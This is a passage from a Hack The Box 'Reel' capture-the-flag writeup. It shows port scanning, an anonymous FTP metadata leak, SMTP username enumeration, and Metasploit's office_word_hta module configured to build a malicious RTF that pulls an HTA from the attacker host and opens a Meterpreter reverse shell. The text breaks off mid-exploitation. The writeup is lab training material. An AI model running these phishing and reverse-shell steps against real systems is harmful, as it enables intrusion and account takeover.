HTB Reel CTF Writeup
HTB Reel CTF is a "Hard" difficulty Windows machine on Hack The Box.
Challenge Summary
HTB Reel CTF is about a Windows Server 2012 R2 domain: we’ll leak a username via FTP metadata, verify it on SMTP, craft a malicious RTF to pop a Meterpreter shell as nico, then ride PowerShell creds and AD ACL tricks to hop nico→tom→claire, and finally unearth the admin password hidden in backup scripts to own the box.
flowchart TD
A["Service Enumeration"] -->|"FTP, SSH, SMTP, SMB"| B["FTP Enumeration"]
B -->|"Download docs & metadata"| C["Leak [email protected]"]
C -->|"SMTP RCPT TO checks"| D["Validate user \"nico\""]
D -->|"Craft malicious RTF"| E["Initial shell as HTB\\nico"]
E -->|"Find cred.xml & decrypt"| F["Extract Tom's creds"]
F -->|"SSH/SMB login"| G["Access as Tom"]
G -->|"PowerView ACL enum"| H["Tom has WriteOwner on Claire"]
H -->|"Reset Claire's password"| I["SSH as Claire"]
I -->|"ACL on Backup_Admins"| J["Claire→Backup_Admins member"]
J -->|"Run winPEAS"| K["Discover admin password"]
K -->|"SSH as Administrator"| L["Win! Administrator access"]
Service Enumeration
Summary
A full-port scan revealed anonymous FTP, SSH, SMTP, SMB and various RPC endpoints on a Windows Server 2012 R2 host, mapping out our attack surface.
Details
# Nmap 7.93 scan initiated Fri May 2 22:42:53 2025 as: nmap -Pn -vv -A -p- -oN scans/nmap.all 10.10.10.77
Nmap scan report for 10.10.10.77
Host is up, received user-set (0.18s latency).
Scanned at 2025-05-02 22:42:53 BST for 490s
Not shown: 65527 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_05-29-18 12:19AM <DIR> documents
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh syn-ack OpenSSH 7.6 (protocol 2.0)
| ssh-hostkey:
| 2048 8220c3bd16cba29c88871d6c1559eded (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDQkehAZGj87mZluxFiVu+GPAAnC/OQ9QKUF2wlIwvefrD2L4zWyGXlAgSbUq/MqujR/efrTIjPYWK+5Mlxc7gEoZBylGAPbdxFivL8YQs3dQPt6aHNF0v+ABS01L2qZ4ewd1sTi1TlT6LtWHehX2PBJ6S3LWG09v+E/3ue97y9gaOjfA6BCMWgQ7K3yvQeHrRpBSk/vQxfCh4TINwV3EGbGTfbs8VvvR+Et7weB5EOifgXfHbyh04KemONkceFSAnjRRYOgwvtXai9imsDJ8KtS2RMR197VK4MBhsY7+h0nOvUMgm76RcRc6N8GW1mn6gWp98Ds9VeymzAmQvprs97
| 256 232bb80a8c1cf44d8d7e5e6458803345 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAw2CYanDlTRpGqzVXrfGTcAYVe/vUnnkWicQPzdfix5gFsv4nOGNUM+Fko7QAW0jqCFQKc8anGAwJjFGLTB00k=
| 256 ac8bde251db7d838389b9c16bff63fed (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICdDfn+n5xueGtHP20/aPkI8pvCfxb2UZA3RQdqnpjBk
25/tcp open smtp? syn-ack
| smtp-commands: REEL, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, X11Probe:
| 220 Mail Service ready
| FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| Hello:
| 220 Mail Service ready
| EHLO Invalid domain address.
| Help:
| 220 Mail Service ready
| DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| SIPOptions:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| TerminalServerCookie:
| 220 Mail Service ready
|_ sequence of commands
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack Windows Server 2012 R2 Standard 9600 microsoft-ds (workgroup: HTB)
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
49159/tcp open msrpc syn-ack Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port25-TCP:V=7.93%I=7%D=5/2%Time=68153D7A%P=x86_64-pc-linux-gnu%r(NULL,
SF:18,"220\x20Mail\x20Service\x20ready\r\n")%r(Hello,3A,"220\x20Mail\x20Se
SF:rvice\x20ready\r\n501\x20EHLO\x20Invalid\x20domain\x20address\.\r\n")%r
SF:(Help,54,"220\x20Mail\x20Service\x20ready\r\n211\x20DATA\x20HELO\x20EHL
SF:O\x20MAIL\x20NOOP\x20QUIT\x20RCPT\x20RSET\x20SAML\x20TURN\x20VRFY\r\n")
SF:%r(GenericLines,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x20se
SF:quence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r\
SF:n")%r(GetRequest,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x20s
SF:equence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r
SF:\n")%r(HTTPOptions,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x2
SF:0sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands
SF:\r\n")%r(RTSPRequest,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\
SF:x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20comman
SF:ds\r\n")%r(RPCCheck,18,"220\x20Mail\x20Service\x20ready\r\n")%r(DNSVers
SF:ionBindReqTCP,18,"220\x20Mail\x20Service\x20ready\r\n")%r(DNSStatusRequ
SF:estTCP,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SSLSessionReq,18,"22
SF:0\x20Mail\x20Service\x20ready\r\n")%r(TerminalServerCookie,36,"220\x20M
SF:ail\x20Service\x20ready\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n
SF:")%r(TLSSessionReq,18,"220\x20Mail\x20Service\x20ready\r\n")%r(Kerberos
SF:,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SMBProgNeg,18,"220\x20Mail
SF:\x20Service\x20ready\r\n")%r(X11Probe,18,"220\x20Mail\x20Service\x20rea
SF:dy\r\n")%r(FourOhFourRequest,54,"220\x20Mail\x20Service\x20ready\r\n503
SF:\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x
SF:20commands\r\n")%r(LPDString,18,"220\x20Mail\x20Service\x20ready\r\n")%
SF:r(LDAPSearchReq,18,"220\x20Mail\x20Service\x20ready\r\n")%r(LDAPBindReq
SF:,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SIPOptions,162,"220\x20Mai
SF:l\x20Service\x20ready\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n50
SF:3\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\
SF:x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x
SF:20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20command
SF:s\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence
SF:\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\x
SF:20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20
SF:commands\r\n");
Service Info: Host: REEL; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -19m58s, deviation: 34m35s, median: 0s
| smb2-time:
| date: 2025-05-02T21:50:24
|_ start_date: 2025-05-02T19:49:40
| smb-os-discovery:
| OS: Windows Server 2012 R2 Standard 9600 (Windows Server 2012 R2 Standard 6.3)
| OS CPE: cpe:/o:microsoft:windows_server_2012::-
| Computer name: REEL
| NetBIOS computer name: REEL\x00
| Domain name: HTB.LOCAL
| Forest name: HTB.LOCAL
| FQDN: REEL.HTB.LOCAL
|_ System time: 2025-05-02T22:50:25+01:00
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 4286/tcp): CLEAN (Timeout)
| Check 2 (port 24595/tcp): CLEAN (Timeout)
| Check 3 (port 32588/udp): CLEAN (Timeout)
| Check 4 (port 37930/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 302:
|_ Message signing enabled and required
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri May 2 22:51:03 2025 -- 1 IP address (1 host up) scanned in 490.54 seconds
FTP Service Enumeration
Summary
Anonymous FTP let us grab two Word docs and a readme. By inspecting the DOCX metadata, we surfaced [email protected]: a golden username for our next moves.
Details
I could log in to the FTP server anonymously:
$ ftp 10.10.10.77
Connected to 10.10.10.77.
220 Microsoft FTP Service
Name (10.10.10.77:user): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp>
There was an immediate folder (documents/) and inside this folder, some files:
ftp> ls
229 Entering Extended Passive Mode (|||41004|)
125 Data connection already open; Transfer starting.
05-29-18 12:19AM <DIR> documents
226 Transfer complete.
ftp> cd documents
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||41005|)
125 Data connection already open; Transfer starting.
05-29-18 12:19AM 2047 AppLocker.docx
05-28-18 02:01PM 124 readme.txt
10-31-17 10:13PM 14581 Windows Event Forwarding.docx
226 Transfer complete.
ftp>
I downloaded all of them using the mget command:
ftp> mget *
mget AppLocker.docx [anpqy?]? y
<SNIP>
mget readme.txt [anpqy?]? y
<SNIP>
mget Windows Event Forwarding.docx [anpqy?]? y
<SNIP>
The readme.txt file indicates I can somehow email
AppLocker.docx describes policies in place in the organization:
The second MS Word file, I couldn’t open using LibreOffice because it says it’s corrupted:
I selected “yes” in order to allow LibreOffice to try and repair the file, but it couldn’t repair it. So I proceeded to analyse metadata for this specific file:
$ file Windows\ Event\ Forwarding.docx
Windows Event Forwarding.docx: Microsoft Word 2007+
The initial bytes, at least, match the correct signature for a MS Word document. The same behavior can be found when inspecting the working file:
$ file AppLocker.docx
AppLocker.docx: Microsoft Word 2007+
Knowing that MS Word saves a lot of metadata by default…
For a Microsoft Word document, this could include information such as the author of the document, the date and time the document was created, the time spent editing the document, its length, its description, comments about the document, etc. For a digital photograph, the metadata might include the type of camera or other device used to create the image, the location where it was taken, and the date and time it was taken, as well as other information. [source]
I dumped all metadata using the exiftool command:
$ exiftool Windows\ Event\ Forwarding.docx
ExifTool Version Number : 12.57
File Name : Windows Event Forwarding.docx
Directory : .
File Size : 15 kB
File Modification Date/Time : 2017:10:31 19:13:23-02:00
File Access Date/Time : 2025:05:06 15:04:27-03:00
File Inode Change Date/Time : 2025:05:02 18:39:04-03:00
File Permissions : -rw-r--r--
File Type : DOCX
File Type Extension : docx
MIME Type : application/vnd.openxmlformats-officedocument.wordprocessingml.document
Zip Required Version : 20
Zip Bit Flag : 0x0006
Zip Compression : Deflated
Zip Modify Date : 1980:01:01 00:00:00
Zip CRC : 0x82872409
Zip Compressed Size : 385
Zip Uncompressed Size : 1422
Zip File Name : [Content_Types].xml
Creator : [email protected]
Revision Number : 4
Create Date : 2017:10:31 18:42:00Z
Modify Date : 2017:10:31 18:51:00Z
Template : Normal.dotm
Total Edit Time : 5 minutes
Pages : 2
Words : 299
Characters : 1709
Application : Microsoft Office Word
Doc Security : None
Lines : 14
Paragraphs : 4
Scale Crop : No
Heading Pairs : Title, 1
Titles Of Parts :
Company :
Links Up To Date : No
Characters With Spaces : 2004
Shared Doc : No
Hyperlinks Changed : No
App Version : 14.0000
And sure enough I got what seems to be a valid username in the system:
Just to make sure I’m not missing anything by not viewing the file, I used the binwalk tool to extract the “corrupted” MS Word doc:
$ binwalk Windows\ Event\ Forwarding.docx -e
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 Zip archive data, at least v2.0 to extract, compressed size: 385, uncompressed size: 1422, name: [Content_Types].xml
954 0x3BA Zip archive data, at least v2.0 to extract, compressed size: 243, uncompressed size: 590, name: _rels/.rels
1758 0x6DE Zip archive data, at least v2.0 to extract, compressed size: 290, uncompressed size: 953, name: word/_rels/document.xml.rels
2370 0x942 Zip archive data, at least v2.0 to extract, compressed size: 2337, uncompressed size: 23414, name: word/document.xml
4754 0x1292 Zip archive data, at least v2.0 to extract, compressed size: 1704, uncompressed size: 7076, name: word/theme/theme1.xml
6509 0x196D Zip archive data, at least v2.0 to extract, compressed size: 925, uncompressed size: 2286, name: word/settings.xml
7481 0x1D39 Zip archive data, at least v2.0 to extract, compressed size: 258, uncompressed size: 428, name: word/webSettings.xml
7789 0x1E6D Zip archive data, at least v2.0 to extract, compressed size: 1991, uncompressed size: 15713, name: word/stylesWithEffects.xml
9835 0x266B Zip archive data, at least v2.0 to extract, compressed size: 323, uncompressed size: 599, name: docProps/core.xml
10492 0x28FC Zip archive data, at least v2.0 to extract, compressed size: 1862, uncompressed size: 14960, name: word/styles.xml
12399 0x306F Zip archive data, at least v2.0 to extract, compressed size: 543, uncompressed size: 1477, name: word/fontTable.xml
12990 0x32BE Zip archive data, at least v2.0 to extract, compressed size: 481, uncompressed size: 991, name: docProps/app.xml
14558 0x38DE End of Zip archive, footer length: 22
It created the folder containing the extracted contents (_Windows Event Forwarding.docx.extracted):
$ ls
AppLocker.docx 'Windows Event Forwarding.docx'
readme.txt '_Windows Event Forwarding.docx.extracted'
To know where to look, I also extracted the working document (AppLocker.docx):
$ binwalk -e AppLocker.docx
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 Zip archive data, at least v2.0 to extract, name: _rels/.rels
223 0xDF Zip archive data, at least v2.0 to extract, name: word/_rels/document.xml.rels
479 0x1DF Zip archive data, at least v2.0 to extract, name: word/document.xml
963 0x3C3 Zip archive data, at least v2.0 to extract, name: word/numbering.xml
1151 0x47F Zip archive data, at least v2.0 to extract, name: word/styles.xml
1333 0x535 Zip archive data, at least v2.0 to extract, name: [Content_Types].xml
2025 0x7E9 End of Zip archive, footer length: 22
I changed directory to the .extracted one just created by binwalk:
$ cd _AppLocker.docx.extracted/
user@attackbox:~/hacking/htb/machines/hard/reel/ftp/_AppLocker.docx.extracted$
And as I have normal access to it when opening via LibreOffice, I used “grep” to search for a string that I know is in the document (in this case, the very beginning “AppLocker procedure”):
$ grep -Rl 'AppLocker procedure' .
./word/document.xml
And sure enough, I could find where the document contents reside (word/document.xml).
I changed directories back to the root of my dirtree, and changed again, this time into the .extracted folder for the “corrupted” document:
$ cd _Windows\ Event\ Forwarding.docx.extracted/word/
user@attackbox:~/hacking/htb/machines/hard/reel/ftp/_Windows Event Forwarding.docx.extracted/word$
I used the best text editor (Sublime Text) to inspect _Windows\ Event\ Forwarding.docx.extracted/word/document.xml, but as you can see, it looks like garbage:
I notice a lot of XML tags. Wondering if removing all of those would do any better, I created a simple python script to strip them off:
#!/usr/bin/env python3
import re
import sys


def strip_xml_tags(text):
    """
    Remove all substrings that look like XML/HTML tags,
    i.e., anything between < and > (non-greedy).
    """
    # The regex '<[^>]+?>' matches '<', then one or more chars that are not '>', then the first '>'
    return re.sub(r'<[^>]+?>', '', text)


def process_file(input_path, output_path=None):
    # Read the whole file
    with open(input_path, 'r', encoding='utf-8') as f:
        content = f.read()
    # Strip tags
    clean = strip_xml_tags(content)
    if output_path:
        # Write cleaned text
        with open(output_path, 'w', encoding='utf-8') as out:
            out.write(clean)
        print(f"Stripped tags and saved to {output_path}")
    else:
        # Print to stdout
        print(clean)


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python strip_xml.py <input.xml> [output.txt]")
        sys.exit(1)
    inp = sys.argv[1]
    out = sys.argv[2] if len(sys.argv) > 2 else None
    process_file(inp, out)
I ran my script and obtained a somewhat raw version of the document’s contents:
$ python3 strip-xml.py document.xml
# get winrm configwinrm get winrm/config# gpo configO:BAG:SYD:(A;;0xf0005;;;SY)(A;;0x5;;;BA)(A;;0x1;;;S-1-5-32-573)(A;;0x1;;;NS)// add to GPOServer=http://WEF.HTB.LOCAL:5985/wsman/SubscriptionManager/WEC,Refresh=60// add to GPO (60 seconds)on source computer: gpupdate /force# prereqsstart Windows Remote Management service on source computeradd builtin\network service account to "Event Log Readers" group on collector server# list subscriptions / exportC:\Windows\system32>wecutil es > subs.txt# check subscription statusC:\Windows\system32>wecutil gr "Account Currently Disabled"Subscription: Account Currently Disabled RunTimeStatus: Active LastError: 0 EventSources: LAPTOP12.HTB.LOCAL RunTimeStatus: Active LastError: 0 LastHeartbeatTime: 2017-07-11T13:27:00.920# change pre-rendering setting in multiple subscriptionsfor /F "tokens=*" %i in (subs.txt) DO wecutil ss "%i" /cf:Events# export subscriptions to xmlfor /F "tokens=*" %i in (subs.txt) DO wecutil gs "%i" /f:xml >> "%i.xml"# import subscriptions from xmlwecutil cs "Event Log Service Shutdown.xml"wecutil cs "Event Log was cleared.xml"# if get error "The locale specific resource for the desired message is not present", change subscriptions to Event format (won't do any hard running command even if they already are in this format)1.for /F "tokens=*" %i in (subs.txt) DO wecutil ss "%i" /cf:Events2.Under Windows Regional Settings, on the Formats tab, change the format to "English (United States)"# check subscriptions are being created on the source computerEvent Log: /Applications and Services Logs/Microsoft/Windows/Eventlog-ForwardingPlugin/Operational#### troubleshooting WEFcollector server -> subscription name -> runtime statusgpupdate /force (force checkin, get subscriptions)check Microsoft/Windows/Eventlog-ForwardingPlugin/Operational for errors
However, there’s honestly not very much to it.
The “mystery” DOCX was just a Windows Event Forwarding playbook. TL;DR:
- Lock down WinRM: dump and tweak its ACL via an SDDL string in GPO so SYSTEM, Admins, Event Log Readers and Network Service can all talk.
- Point clients at your collector: GPO → WinRM Client → SubscriptionManager = http://WEF.HTB.LOCAL:5985/wsman/SubscriptionManager/WEC,Refresh=60, then gpupdate /force to make it stick.
- Prep machines: on each source, start the WinRM service; on the collector, add the Network Service account to the “Event Log Readers” group.
- Manage subscriptions with wecutil:
  - wecutil es → list subs → save names to subs.txt
  - wecutil gr "<name>" → check status, errors, heartbeats
  - Bulk-fix to raw XML: for /F "tokens=*" %i in (subs.txt) DO wecutil ss "%i" /cf:Events
  - Export each sub to its own XML: for /F "tokens=*" %i in (subs.txt) DO wecutil gs "%i" /f:xml >> "%i.xml"
  - Re-import on any collector with wecutil cs "<sub>.xml".
- Locale gotchas: if you hit “locale resource not found,” either force raw XML again or switch your Regional Format to English (United States).
- Final check: run wecutil es or wecutil gr "<name>"; everything should be Active with LastError: 0 and fresh heartbeats.
Boom—the corrupt DOC just hid a WEF cheat-sheet, nothing more arcane than command-line magic for centralizing Windows event logs. Yes, it does leak some info like:
http://WEF.HTB.LOCAL:5985
Or even:
LAPTOP12.HTB.LOCAL
But none of this helps us complete the challenge. The important thing to get out of this is really the metadata leaking the username. We’ll use it soon.
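Both the metadata leak and the tag-stripping script above can be handled straight from the DOCX zip with the standard library. The following is an added example (mine, not the writeup’s strip-xml.py): it reads docProps/core.xml for identity-bearing fields (the kind of thing a pre-publication metadata scrub should catch) and walks word/document.xml paragraph by paragraph, so the text comes out with its line breaks instead of as one run-on line. The sample document and the address inside it are constructed in memory.

```python
#!/usr/bin/env python3
"""Inspect a DOCX without Word: core metadata plus paragraph-aware text.
Added example (not the writeup's strip-xml.py); the document returned by
build_sample_docx() and the address in it are constructed for the demo."""
import io
import zipfile
import xml.etree.ElementTree as ET

NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
    "w": "http://schemas.openxmlformats.org/wordprocessingml/2006/main",
}
W = "{%s}" % NS["w"]


def read_core_properties(docx_bytes):
    """Return {localname: text} for every element in docProps/core.xml
    (creator, lastModifiedBy, revision, created, modified, ...)."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        root = ET.fromstring(z.read("docProps/core.xml"))
    # tags look like '{namespace}creator'; keep only the local name
    return {el.tag.rsplit("}", 1)[-1]: (el.text or "").strip() for el in root}


def leaked_identities(props):
    """Metadata values that look like e-mail addresses."""
    return sorted({v for v in props.values() if "@" in v})


def extract_paragraphs(docx_bytes):
    """Join the w:t runs inside each w:p of word/document.xml, one string per
    paragraph, instead of stripping tags and losing the paragraph breaks."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        root = ET.fromstring(z.read("word/document.xml"))
    paragraphs = []
    for p in root.iter(W + "p"):
        text = "".join(t.text or "" for t in p.iter(W + "t"))
        if text:
            paragraphs.append(text)
    return paragraphs


def build_sample_docx():
    """Constructed minimal DOCX holding just the two parts read above."""
    core = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<cp:coreProperties xmlns:cp="%s" xmlns:dc="%s">'
        "<dc:creator>nico@example.invalid</dc:creator>"
        "<cp:lastModifiedBy>nico@example.invalid</cp:lastModifiedBy>"
        "<cp:revision>4</cp:revision>"
        "</cp:coreProperties>"
    ) % (NS["cp"], NS["dc"])
    document = (
        '<w:document xmlns:w="%s"><w:body>'
        "<w:p><w:r><w:t># get winrm config</w:t></w:r></w:p>"
        "<w:p><w:r><w:t>winrm get </w:t></w:r><w:r><w:t>winrm/config</w:t></w:r></w:p>"
        "<w:p/>"
        "</w:body></w:document>"
    ) % NS["w"]
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("docProps/core.xml", core)
        z.writestr("word/document.xml", document)
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_docx()
    props = read_core_properties(sample)
    print("creator:", props.get("creator"))
    print("identities to scrub:", leaked_identities(props))
    for line in extract_paragraphs(sample):
        print(line)
```

Point read_core_properties() and extract_paragraphs() at the bytes of a real .docx and you get the same creator field exiftool reported, plus the document text with its paragraph breaks intact.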
Mail Server Enumeration
Summary
Hitting the SMTP server with RCPT TO checks confirmed that [email protected] is a valid recipient, locking in our target account.
Details
There are well-known and documented ways to enumerate usernames on an SMTP server, and I could do just that in the following snippet:
$ telnet 10.10.10.77 25
Trying 10.10.10.77...
Connected to 10.10.10.77.
Escape character is '^]'.
220 Mail Service ready
HELO X
250 Hello.
MAIL FROM:[email protected]
250 OK
RCPT TO:[email protected]
550 Unknown user
RCPT TO:[email protected]
250 OK
^[^]
telnet> quit
Connection closed.
You see how it recognizes “[email protected]” but says “[email protected]” is unknown. That means nico is indeed a valid username, at least in the mail server.
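The exchange above works because the server answers RCPT TO differently for known and unknown local parts. The following added example (mine, not the writeup’s session or the target’s mail software) models that exchange with a tiny in-process responder and lets you switch the RCPT policy between the leaking behaviour (550 for unknown users) and the usual mitigation (a uniform 250 for everyone, with rejection deferred to a bounce); KNOWN_USERS and the example.invalid addresses are constructed.

```python
#!/usr/bin/env python3
"""Model of the SMTP RCPT TO exchange with a switchable recipient policy.
  'reject' : 550 for unknown local parts (the behaviour that leaks names)
  'uniform': 250 for every recipient (accept-then-bounce mitigation)
Added example, not from the writeup; KNOWN_USERS is a constructed list."""

KNOWN_USERS = {"nico", "tom"}  # constructed: local parts the demo server knows


class SmtpResponder:
    """Minimal server-side state machine; handle() returns one reply line."""

    def __init__(self, known_users, policy="reject"):
        self.known_users = known_users
        self.policy = policy
        self.greeted = False
        self.sender = None

    @staticmethod
    def _address(arg):
        # 'TO:<user@host>' or 'TO:user@host' -> 'user@host'
        return arg.split(":", 1)[-1].strip().strip("<>")

    def handle(self, line):
        verb, _, arg = line.strip().partition(" ")
        verb = verb.upper()
        if verb in ("HELO", "EHLO"):
            self.greeted = True
            return "250 Hello."
        if verb == "MAIL":
            if not self.greeted:
                return "503 Bad sequence of commands"
            self.sender = self._address(arg)
            return "250 OK"
        if verb == "RCPT":
            if self.sender is None:            # RCPT before MAIL FROM
                return "503 Bad sequence of commands"
            local_part = self._address(arg).split("@", 1)[0].lower()
            if self.policy == "reject" and local_part not in self.known_users:
                return "550 Unknown user"
            return "250 OK"
        if verb == "QUIT":
            return "221 Bye"
        return "500 Command not recognized"


def rcpt_codes(policy, candidates):
    """Run the scripted exchange and collect the 3-digit code per candidate."""
    server = SmtpResponder(KNOWN_USERS, policy)
    transcript = []
    for cmd in ("HELO X", "MAIL FROM:<sender@example.invalid>"):
        transcript.append((cmd, server.handle(cmd)))
    codes = {}
    for name in candidates:
        cmd = f"RCPT TO:<{name}@example.invalid>"
        reply = server.handle(cmd)
        transcript.append((cmd, reply))
        codes[name] = reply.split()[0]
    transcript.append(("QUIT", server.handle("QUIT")))
    return codes, transcript


def leaks_valid_names(policy, candidates):
    """True when candidates receive different codes, i.e. the reply alone
    distinguishes valid names from invalid ones."""
    codes, _ = rcpt_codes(policy, candidates)
    return len(set(codes.values())) > 1


if __name__ == "__main__":
    probe = ["nico", "asdfasdf"]
    for policy in ("reject", "uniform"):
        codes, transcript = rcpt_codes(policy, probe)
        print(f"--- policy={policy} leaks={leaks_valid_names(policy, probe)}")
        for cmd, reply in transcript:
            print(f"C: {cmd}\nS: {reply}")
```

Under the uniform policy the transcript for a valid and an invalid name is identical, which is the property to check for on a mail gateway; the 503 on an out-of-order RCPT mirrors the "Bad sequence of commands" lines in the nmap fingerprint above.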
Initial Shell
Summary
Using Metasploit’s office_word_hta module, we built a malicious RTF, emailed it to Nico, and scored a Meterpreter session as HTB\nico when the victim opened it.
Details
Using the knowledge acquired to this point from the FTP and SMTP server enumeration, the attack path is clear: I gotta email “[email protected]” a malicious RTF attachment that somehow grants me access to privileged info or even a shell on the box.
I fired up msfconsole and searched for RTF-related exploits:
msf6> search rtf
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
<SNIP>
17 exploit/windows/fileformat/office_ms17_11882 2017-11-15 manual No Microsoft Office CVE-2017-11882
18 exploit/windows/fileformat/office_word_hta 2017-04-14 excellent No Microsoft Office Word Malicious Hta Execution
19 exploit/unix/webapp/openmediavault_rpc_rce 2020-09-28 excellent Yes OpenMediaVault rpc.php Authenticated PHP Code Injection
<SNIP>
A lot came up. Reading through, some of them are related to old CVEs, some of them not related at all to what I’m looking for, until my gaze met exploit no. 18 (exploit/windows/fileformat/office_word_hta):
Microsoft Office Word Malicious Hta Execution
I selected it, and began to look through the configuration options:
msf6> use 18
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/fileformat/office_word_hta) > options
Module options (exploit/windows/fileformat/office_word_hta):
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME msf.doc yes The file name.
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. Th
is must be an address on the local machine or 0.0.0.
0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randoml
y generated)
URIPATH default.hta yes The URI to use for the HTA file
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process,
none)
LHOST 10.137.0.20 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Microsoft Office Word
View the full module info with the info, or info -d command.
I ran the “info” command to make sure I know the details about the module, and it talks about a vulnerability in MS word from back in 2016:
msf6 exploit(windows/fileformat/office_word_hta) > info
<SNIP>
Description:
This module creates a malicious RTF file that when opened in
vulnerable versions of Microsoft Word will lead to code execution.
The flaw exists in how a olelink object can make a http(s) request,
and execute hta code in response.
This bug was originally seen being exploited in the wild starting
in Oct 2016. This module was created by reversing a public
malware sample.
And it’s interesting because from the exiftool output from earlier, I notice that the document was created around 2017 as well:
$ exiftool Windows\ Event\ Forwarding.docx
ExifTool Version Number : 12.57
File Name : Windows Event Forwarding.docx
Directory : .
File Size : 15 kB
File Modification Date/Time : 2017:10:31 19:13:23-02:00
<SNIP>
Create Date : 2017:10:31 18:42:00Z
Modify Date : 2017:10:31 18:51:00Z
<SNIP>
So it’s completely possible the MS word version they’re using is dated from back when this was still exploitable. I began configuring the exploit (which honestly didn’t require much):
msf6 exploit(windows/fileformat/office_word_hta) > set SRVHOST tun0
SRVHOST => 10.10.14.5
msf6 exploit(windows/fileformat/office_word_hta) > set LHOST tun0
LHOST => 10.10.14.5
And ran it:
msf6 exploit(windows/fileformat/office_word_hta) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.14.5:4444
msf6 exploit(windows/fileformat/office_word_hta) > [+] msf.doc stored at /home/user/.msf4/local/msf.doc
[*] Using URL: http://10.10.14.5:8080/default.hta
[*] Server started.
It created my malicious RTF file at /home/user/.msf4/local/msf.doc (as seen from the output above). I copied it to my CWD:
$ cp /home/user/.msf4/local/msf.doc .
And I also created another copy, but with the .rtf extension just to make sure:
$ cp msf.doc msf.rtf
I have both files in my CWD:
$ ls
ftp msf.doc msf.rtf scans
And, with those files, and the jobs running in my msfconsole terminal, waiting for connection:
msf6 exploit(windows/fileformat/office_word_hta) > jobs
Jobs
====
Id Name Payload Payload opts
